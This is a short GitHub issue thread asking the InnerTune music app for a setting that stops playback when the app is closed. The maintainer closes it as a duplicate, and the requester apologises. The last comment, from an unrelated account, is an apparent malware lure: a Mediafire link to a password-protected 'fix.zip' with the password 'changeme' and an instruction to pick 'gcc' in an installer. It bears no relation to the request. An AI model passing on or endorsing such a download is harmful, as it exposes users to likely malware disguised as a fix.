### ISSUE TITLE
Please add a option in settings which would ensure music playback to stop when app is closed from recent tasks and ram

### ISSUE THREAD

**Issue by dainvincible1** [Malopieds/InnerTune#347] opened 2024-08-26 15:12 UTC
### Checklist

- [X] I've checked that there is no other issue about this feature request.
- [X] This issue contains only one feature request.
- [X] The title of this issue accurately describes the feature request.

### Feature description

![image](https://github.com/user-attachments/assets/9f94d7bf-bb4b-4633-9446-54cabd8a752d)

a toggle like this

### Why do you want this feature?

It takes more steps to close and stop the song and remove it from the notification or status bar.

**Comment by Malopieds** [comment] 2024-08-26 15:12
Duplicate of #18

Which was opened by no other than you...

**Closed as completed by Malopieds** 2024-08-26 15:12 UTC
Labels: enhancement

**Comment by dainvincible1** [comment] 2024-08-26 15:20
> Duplicate of #18
> 
> Which was opened by no other than you...

lol sorry

**Comment by Lxx-c** [comment] 2024-08-26 15:21
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
